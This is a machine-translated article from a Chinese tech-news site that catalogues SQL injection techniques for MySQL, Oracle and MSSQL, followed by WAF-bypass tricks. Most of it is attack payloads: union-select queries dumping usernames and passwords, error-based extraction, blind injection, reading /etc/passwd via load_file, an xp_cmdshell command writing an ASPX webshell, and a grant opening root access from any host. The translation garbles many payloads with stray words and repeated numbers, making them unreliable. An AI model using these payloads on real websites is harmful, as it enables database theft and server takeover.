In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-14 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
Editor to share with you what SQL injection types are, I believe most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!
Preface
The attack methods of SQL injection can be divided into explicit injection, error injection and blind injection according to the application's processing of database return content.
Visible injection
Attackers can get what they want directly from the current interface content.
Error injection
The result of the database query is not displayed on the page, but the application prints the database error information to the page, so the attacker can construct the database error statement and get the desired content from the error message.
Blind injection
Database query results cannot be obtained from intuitive pages, and attackers obtain what they want by using database logic or delaying the execution of the database.
Manual injection of Mysql
Lian is co-injected with id=1' order by 4 Group_concat (password) from users-- + group_concat can be replaced with concat_ws (', id,users,password)? id=0' union select 1, 2, 2, 3, from users limit, 0, 0, 5, 5, 5, 5, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 4, 6, 4, 6, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4
Error injection
1.floor ()
Select * from test where id=1 and (select 1 from (select count (*), concat (user (), floor (rand (0) * 2) x from information_schema.tables group by x) a)
2.extractvalue ()
Select * from test where id=1 and (extractvalue (1) concat (0x7e, (select user ()), 0x7e))
3.updatexml ()
Select * from test where id=1 and (updatexml (1) concat (0x7e, (select user ()), 0x7e), 1)
4.geometrycollection ()
Select\ * from test where id=1 and geometrycollection ((select\ * from (select\ * from (select user ()) a) b))
5.multipoint ()
Select\ * from test where id=1 and multipoint ((select\ * from (select\ * from (select user ()) a) b))
6.polygon ()
Select\ * from test where id=1 and polygon ((select\ * from (select\ * from (select user ()) a) b))
7.multipolygon ()
Select\ * from test where id=1 and multipolygon ((select\ * from (select\ * from (select user ()) a) b))
8.linestring ()
Select\ * from test where id=1 and linestring ((select\ * from (select\ * from (select user ()) a) b))
9.multilinestring ()
Select\ * from test where id=1 and multilinestring ((select\ * from (select\ * from (select user ()) a) b))
10.exp ()
Select\ * from test where id=1 and exp (\ ~ (select\ * from (select user ()) a)) Explosion library:? id=1' and updatexml (1, (select concat (0x7e, (schema\ _ name), 0x7e) from information\ _ schema.schemata limit 2 schema.schemata limit 1), 1)-+ explosion table:? id=1' and updatexml (1, (select concat (0x7e, (table\ _ name), 0x7e) from information\ _ schema.tables where table\ _ schema='security' limit 3), 1)-+ explosion field:? id=1' and updatexml (1, (select concat (0x7e, (column\ _ name)) 0x7e) from information\ _ schema.columns where table\ _ name=0x7573657273 limit 2Power1), 1)-- + burst data:? id=1' and updatexml (1, (select concat (0x7e) passwordPower0x7e) from users limit 1), 1)-- + concat can also be put outside updatexml (1) updatexml (0x7e, (select password from users limit 1), 0x7e), 1) blind injection
Time blind injection
Common function sleep ()
Segmentation functions substr, substring, left
Ascii () hex () can be encoded without quotation marks.
In general time blind injection, we also need to use conditional judgment function.
If (expre1,expre2,expre3)
When expre1 is true and expre2,false is returned, expre3 is returned.
? id=1' and if (ascii (substr (database (), 1Pol 1)) > 115 id=1' and if ((substr ((select user ()), 1Pol 1) ='r'), sleep (5), 1)-- +
Boolean blind injection
? id=1' and substr ((select user ()), 1Power1) ='r'-- +? id=1' and IFNULL ((substr ((select user ()), 1Power1) ='r'), 0)-- + / / if the expression of the first parameter of IFNULL is NULL, the alternate value of the second parameter is returned. If it is not Null, the output value? id=1' and strcmp ((substr ((select user ()), 1Magne1) ='r'), 1)-- + / / if all strings are the same, STRCMP () returns 0, if the first parameter is less than the second according to the current classification order, it returns-1. Otherwise, it returns 1 insert.
This kind of injection will appear in registrations, ip headers, message boards and other places where data needs to be written. For example, using sqlmap will generate a lot of junk data.
Attempted insertion, quotation marks, double quotes, escape characters\ make the statement unable to execute properly, and then if the insert fails, the update fails, and then in-depth testing to determine whether there is injection
Secondary injection and wide byte injection
Secondary injection:
In sql statements without single quotes, hexadecimal encoding is performed so that there are no single quotation marks
Wide byte injection:
If the single quotation mark is escaped as', mysql will encode\ as% 5c, and the two bytes in the wide byte represent a Chinese character, so adding% df to% 5c turns into a Chinese character "Qing", thus bypassing the escape.
Manual injection of Oracle
Lian co-injection
? id=-1' union select user,null from dual--?id=-1' union select version,null from id=-1' union select column name,null from (select\ * from (select rownum as limit,column\ _ name from user\ _ tab\ _ columns where table\ _ name = 'USERS') where limit=2)--? union select table\ _ name,null from (select\ * from (select rownum as limit,table\ _ name from user\ _ tables) where limit=2) Passwd from users--?id=-1' union select username,passwd from (select\ * from (select username,passwd,rownum as limit from users) where limit=3)-
Error injection
? id=1' and 1=ctxsys.drithsx.sn (1, (select user from dual))--? id=1' and 1=ctxsys.drithsx.sn (1, (select banner from v$version where banner like 'Oracle%))--? id=1' and 1=ctxsys.drithsx.sn (1, (select table\ _ name from (select rownum as limit,table\ _ name from user\ _ tables) where limit= 3))--? id=1' and 1=ctxsys.drithsx.sn (1, (select column\ _ name from (select rownum as limit) Column\ _ name from user\ _ tab\ _ columns where table\ _ name = 'USERS') where limit=3))-- id=1' and 1=ctxsys.drithsx.sn (1, (select passwd from (select passwd,rownum as limit from users) where limit=1))--
Boolean blind injection
? id=1' and 1 = (select decode (user,'SYSTEM',1,0,0) from dual)--? id=1' and 1 = (select decode (substr (user,1,1), 'from dual))--? id=1' and ascii (substr (user,1,1)) > 64Mel-
Time blind injection
? id=1' and 1 = (case when ascii (substr (user,1,1)) > 128 then DBMS\ _ PIPE.RECEIVE\ _ MESSAGE ('astute substr 5) else 1 end)--? id=1' and 1 = (case when ascii (substr (user,1,1)) > 64 then DBMS\ _ PIPE.RECEIVE\ _ MESSAGE (' ajar Magazine 5) else 1 end)--
Manual injection of SQL
Judge whether the injection point exists or not
Digital injection
Input after url
And 1 # 1
And 1: 2
If the return is different, the existence of the injection point can be judged.
Example:
Http://www.xxx.cn/news.php?p=1&id=4' returned an error
Http://www.xxx.cn/news.php?p=1&id=4 and 1: 1 returns correct
Http://www.xxx.cn/news.php?p=1&id=4 and 1: 2 returned an error
Character injection
Input after url
'and 1, 1, and' 1, please.
'and 1, 2, and' 1, please.
Http://www.xxx.cn/news.php?p=1&id=4' returned an error
Http://www.xxx.cn/news.php?p=1&id=4' and 1 / 1 and'1 / 2 / 1 returns correct
Http://www.xxx.cn/news.php?p=1&id=4' and 1'2 and'1 error returned
Search injection
Enter in the input box
'return an error
X% 'and 1 and'%'= 'returned correct
X% 'and 1' 2 and'%'= 'returned an error
Number of judging fields
Digital type
Http://www.xxx.cn/news.php?p=1&id=4 order by 26 returned correct
Http://www.xxx.cn/news.php?p=1&id=4 order by 27 returned an error
It is concluded that the number of fields is 26.
Character type
Http://www.xxx.cn/news.php?p=1&id=4' order by 26 # returned correct
Http://www.xxx.cn/news.php?p=1&id=4' order by 27 # returned an error
It is concluded that the number of fields is 26.
Search type
X% 'order by 26 # returned correct
X% 'order by 27 # returned an error
It is concluded that the number of fields is 26.
Look for displayable fields
Digital type
Http://www.xxx.cn/news.php?p=1&id=4 and 1 minute 2 union select 1 2 union select 3 4 5 6 7 8 and 9....
Character type
Http://www.xxx.cn/news.php?p=1&id=4' and 1 minute 2 union select 1 2 union select 3 4 5 6 7 8 and 9.... #
Search type
X% 'and 1 union select 1 union select 2, 3, 4, 5, 6, 7, 8, and 9.... #
Look up the database name
Digital type
Http://www.xxx.cn/news.php?p=1&id=4 and 1 minute 2 union select 2 union select (), 4, 5, 6, 7, 8, and 9.
Character type
Http://www.xxx.cn/news.php?p=1&id=4' and 1 minute 2 union select 2 union select (), 4, 5, 6, 7, 8, and 9. #
Search type
X% 'and 1 minute 2 union select 1 union select 2 Magi database (), 4 Jol 5 pr 6 pr 7 pr 8 pr 9.. #
Look up the table name in the database
Digital type
Http://www.xxx.cn/news.php?p=1&id=4 and 1 minute 2 union select 1 from information_schema.tables where table_schema=' group concat (table_name), 3, 4, 5, 6, 7, 9, 10, 11, 12, 13, 14, 14, 15, 16, 17 and the name of the database.
Database names can also be used in hexadecimal
Character type
Http://www.xxx.cn/news.php?p=1&id=4' and 1 minute 2 union select 1 from information_schema.tables where table_schema=' group concat (table_name), 3, 4, 5, 6, 7, 9, 10, 11, 12, 13, 14, 14, 15, 16 and 17 from information_schema.tables where table_schema=' database name'#
Database names can also be used in hexadecimal
Search type
X% 'and 1 union select 1 union select 2 MagneGroups concat (table_name), 4 Personals 5 pencils 6 pencils 7 pencils 8 pencils 9.... From information_schema.tables where table_schema=' database name'#
Database names can also be used in hexadecimal
Look up the column names in the table
Digital type
Http://www.xxx.cn/news.php?p=1&id=4 and 1 minute 2 union select 1 from information_schema.columns where table_name=' group concat (column_name), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 14, 15, 16 and 17 from information_schema.columns where table_name='.
Table names can also be used in hexadecimal
Character type
Http://www.xxx.cn/news.php?p=1&id=4' and 1 minute 2 union select 1 from information_schema.columns where table_name=' group concat (column_name), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 14, 15, 16, 17, 10, 10, 10, 14, 14, 15, 16, 17 and the name of the table'#
Table names can also be used in hexadecimal
Search type
X% 'and 1 minute 2 union select 1 union select 2 MagneGroups concat (column_name), 4 Personals 5 pencils 6 pencils 7 pencils 8 pencils 9.... From information_schema.columns where table_name=' table name'#
Table names can also be used in hexadecimal
Look up the data in the table
Digital type
Http://www.xxx.cn/news.php?p=1&id=4 and 1 minute 2 union select 1 from group concat (username,password), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 14, 15, 16 and 17 from.
Character type
Http://www.xxx.cn/news.php?p=1&id=4' and 1 minute 2 union select 1 from group concat (username,password), 3, 4, 5, 6, 7, 9, 10, 11, 12, 13, 14, 14, 15, 16 and 17 from
Search type
X% 'and 1 minute 2 union select 1 union select 2 MagneGroups concat (username,password), 4 Personals 5 pencils 6 pencils 7 pencils 8 pencils 9.... From table name #
Display version: select version ()
Display character set: select @ @ character_set_database
Show database show databases
Display table name: show tables
Display computer name: select @ @ hostname
Show system version: select @ @ version_compile_os
Show mysql path: select @ @ basedir
Show database path: select @ @ datadir
Display root password: select User,Password from mysql.user
Open external connection: GRANT ALL PRIVILEGES ON. TO 'root'@'%' IDENTIFIED BY' 123456 'WITH GRANT OPTION
MySQL function utilization
MySQL provides the load_file () function to help users read files quickly, but the file location must be on the server, the file path must be absolute, and root permission is required.
The SQL statement is as follows: union select 1 _ file ('/ etc/passwd').
In general, some anti-injection statements do not allow single quotation marks, so you can use the following statement to bypass:
Union select 1 loadbox file (0x272F6574632F70617373776427), 3meme 4je 5 #
Hexadecimal conversion of the path.
Manual injection of MSSQL
Different from SQL injection, SQL uses the exposed fields, MSSQL uses error injection, inserts malicious sql statements, makes the query report errors, and displays the information we want in the reported errors.
Injection point:
Www.xxx.cn/xxx/xxx.aspx?id=1
Query database version
@ @ version:MSSQL global variable, which represents the database version information.
Test statement:
Http://www.xxx.cn/xxx/xxx.aspx?id=1 and @ @ version > 0
Note: "and @ @ vsersion > 0" can also be written as "and 0/@@version > 0"
Error message:
After changing the nvarchar value of 'Microsoft SQL Server 2008 R2 (SP3)-10.50.6000.34 (X64) Aug 19 2014 Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1d:\ KfSite\ kaifeng\ 2.asptimule-
Aspx Trojan:
Http://www.xxx.cn/xxx/xxx.aspx?id=1;exec master..xp_cmdshell 'echo ";'" > C:\ inetpub\ wwwroot\ 2.aspx'--
The principle is that sql server supports stacked queries, cmd instructions can be executed with xp_cmdshell, and files can be written to disk with [echo content > File] in cmd instructions.
Bypass WAF with hex coding
Http://www.xxx.com/xxx/xxx.aspx?username=xxx uses the "HEX Encoding" under the Encoding of the hackbar tool in Firefox to easily encode the string into a usable hex, and then use error injection to inject it into the site.
Explode the database version
Select convert (int,@@version)
After hex encoding: 0x73656c65637420636f6e7665727428696e742c404076657273696f6e29
Then inject it in the following way:
Http://www.xxx.com/xxx/xxx.aspx?username=xxx';dEcLaRe @ s vArChAr (8000) sEt @ s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC (@ s)-
Error message:
Failed to convert the nvarchar value 'Microsoft SQL Server 2008 R2 (RTM)-10.50.1600.1 (X64) Apr 2 15:48:46 Copyright (c) Microsoft CorporationStandard Edition (64-bit) on Windows NT 2010 (Build 7601: Service Pack 1) (Hypervisor)' to data type int.
Notice the following injection statement:
DEcLaRe @ s vArChAr (8000) / / declares a local variable @ s of type varchar (8000)
SEt @ s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 / / assigns @ s the hexadecimal code of "select convert (int,@@version)"
EXeC (@ s) / / calls the function exec () to execute the contents of "@ s".
Explode the current database
Select convert (int,db_name ())
Explode the current user
Select convert (int,User_Name ())
Burst the meter
Select convert (int, (select top 1 name from abc [database name] .sys.all_objects where type='U' AND is_ms_shipped=0)) select convert (int, (select top 1 name from abc [database name] .sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('CMS_ArticleClass')
Burst field
Select convert (int, (select top 1 COLUMN_NAME from abc [database name] .information_schema.columns where TABLE_NAME='CMS_Userinfo [table name]) select convert (int, (select top 1 COLUMN_NAME from abc [database name] .information_schema.columns where TABLE_NAME='CMS_Userinfo [table name] 'and COLUMN_NAME not in (' id')
Explosion data
Select convert (int, (select top 1 username from CMS_Admin)) select convert (int, (select top 1 password from CMS_Admin))
SQL injection you ask me to answer a little knowledge
1.id-1, if the page returns the correct page, it means that there is injection, then is + 1 OK? (www.test.com/xsn.php?id=12+1)
No, because the plus sign means a space in url.
two。 Do you know how many annotations there are in mysql?
Three: ①. # this comment until the end of the line; ②. / comment multiline /; ③.-+ this comment until the end of the line.
The third kind needs to be explained, because I didn't know this method before. I probably have an impression that'-'is an annotation, but-+ is confused. It's actually-- pay attention-- there's a space after it. But in url, your direct spaces will be disposed of by the browser directly, so you can't get to the database. So use the plus sign instead.
3. Can "select select * from admin" be executed? If not, please explain.
Cannot be executed. Enclose the second one when using the select double layer, otherwise it will be invalid.
4. If the spaces are filtered, do you know what can be bypassed? Or do you know what can replace spaces? These are empty characters. For example, un%0aion will be treated as union. If the space is filtered, the possible sql statement will become: select from messages where uid=45or1=1, we can use / / to replace the space: http://www.xxx.com/index.php?id=45//or/**/1=1 another:% 09% 0A% 0D + / |-| / @-| /?-| / |% 20% 20 | / can all replace spaces.
What are the permissions of the Oracle database under 5.Windows? The Oracle database under Windows must be run with system privileges.
What is the difference between 6.SQL injection and SQL blind injection?
In conventional SQL injection, the application returns the data in the database and presents it to you, while in the SQL blind injection vulnerability, you can only get two different responses corresponding to the true or false conditions in the injection. The application will return different values for the true or false conditions, but the attacker cannot retrieve the query results.
7. What is the main cause of SQL injection vulnerabilities?
Web applications do not fully review the data provided by users and do not encode the output is the main cause of the problem.
8. What is a stack query (stacked query)?
In a single database connection, whether to execute multiple query sequences and whether to allow stacking queries or not is one of the important factors that affect whether SQL injection vulnerabilities can be exploited.
In MYSQL, SELECT * FROM members; DROP members; can be executed, and the database certainly supports stacked queries, but sql statements that let php execute stacked queries are not necessarily rows.
/ *!. *
What do you mean?
MYSQL database is unique, if you add an exclamation point at the beginning of the comment followed by the database version number, then the comment will be parsed into code, as long as the database version is higher than or equal to the version contained in the comment, the code will be executed.
Select 1 /! 40119 + 1 /
The result of the query:
Return 2 (MySQL version 4.01.19 or higher)
Return 1 (other cases)
10. What if the'='in the injection statement is filtered?
Consider using the like keyword instead of: union select password from users where username like admin
11. What if the spaces are filtered? Consider using'/ * / 'instead of:
Union//select//password//from//users//where//username//like//admin
Note that if keywords are filtered, in MySQL, you can also use inline comments inside keywords to bypass:
Uni//on//sel//ect//password//fr//om//users//wh//ere//username//like//admin
'+' in 12.SQL injection?
MSSQL: in MSSQL, the "+" operator is used for string concatenation and addition operations.
MySQL: in MySQL, the "+" operator is only used for addition operations.
Oracle: in Oracle, the "+" operator is only used for addition operations.
13. The connector of the string in the database?
MSSQL:'a'+'b'='ab'
MYSQL:'a' 'baked goods ab'
Oracle:'a' | | 'breadwinner'
14. Comment character
MSSQL:'--'(pay attention to the space behind),'/... /'
MySQL:'--','#','/... /', note-- there must be one or more spaces after it.
Oracle:'--','/... /'
Among the three databases, the common comment character is'- -'
WAF bypass
Bypass at the rule level
SQL commentator bypass
Union/**/select
Union/aaaabbs/select
Union/aaaaaaaaaaaaaaaaaaaaaaaaaaaa/select
Inline comment: /! xxxx/
White space symbol bypass:
MySQL Whitespace:% 90Magi% 0A Magi% 0B Magi% 0D Magi% 20Magi% 0C Magi% A0Magi Company xxx /
Regular whitespace:% 09, 0A, 0A, 0B, 0D, 20, etc.
Example-1:union%250Cselect
Example-1:union%25A0select
Function separator:
Concat%2520 (
Concat/**/ (
Concat%250c (
Concat%25a0 (
Floating point lexical analysis:
Select * from users where id=8E0union select
1,2,3,4,5,6,7,8,9,0
Select * from users where id=8.0union select
1,2,3,4,5,6,7,8,9,0
Select * from users where id=\ Nunion select
1,2,3,4,5,6,7,8,9,0
SQL injection using error_based:
Error-based SQL injection functions are very easy to ignore
Extractvalue (select*from (select*from (select@@version) f)) polygon ((select*from (select name_const (version (), 1) linestring () multipoint () multilinestring () multipolygon ()
MySQL special syntax
Select {x table_name} from {x information_schema.tables}
You can find a way around every point.
Using comment bypass as an example, start Fuzz
The comment character bypasses:
* first test the most basic: union/**/select
* introduce a special word: union/aaaabbs/select in the middle of the retest
* Last test comment length: union/aaaaaaaaaaaaaaaaaaaaaaa/select
The most basic model:
Union/something/select
Case bypass
If the filtering keyword is set in the program, but there is no in-depth analysis and filtering of the keyword composition in the filtering process, resulting in filtering only on the whole.
For example: and filtering. Of course, this kind of filtering only finds keywords and does not deal with keywords. Filtering can be bypassed by changing the inner letter case of the keyword.
Conventional bypass means
Double write bypass
If the keyword is set in the program and replaced with null, then the SQl injection attack will not occur. Double write bypass can be used for such a filtering strategy. Because there is only one replacement during the filtering process.
For example: filter union as soon as it is found that union will be replaced with null regardless of case. It is possible to bypass the filter by writing double-write uniunionon.
Coding bypass
The online coding of URl in the network can be used to bypass the filtering mechanism of SQL injection.
Http://tool.chinaz.com/Tools/urlencode.aspx 1
Inline comment bypass
Content in content comments in Mysql can be executed as SQL statements.
Bypass SQL injection for filtering and and or
Some features of Mysql:
1. The case in Mysql is not sensitive, uppercase and lowercase are the same.
2. Hexadecimal and URL coding in Mysql.
3. Replace and with symbols and keywords-- > & &, or-- > | |
4. Inline comments and multiline comments /! Inline comments / / multiline comments /.
5. URL and Hex encoded content will be automatically identified in Mysql.
Bypass strategy:
1. Case deformation, or,OR,oR,Or,and,And,AND,aND, etc.
2. Add comments to these two sensitive words, such as a/**/and double writing: oorr
3. Replace and- > & &, or- > with symbols | |
Bypass SQL injection for space division
Code: hex,urlencode
Space URL coding:
0a create a new row
A new page
0d return feature
TAB key (vertical)
Sqlmap Security Inspection:
Sqlmap-u "URL"-hex-dbs-batch
Bypass SQL injection for division (union and select)
Encode% 0a, add / * * / character, union/select case, double write, etc.
The above is all the content of the article "what are the SQL injection types?" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.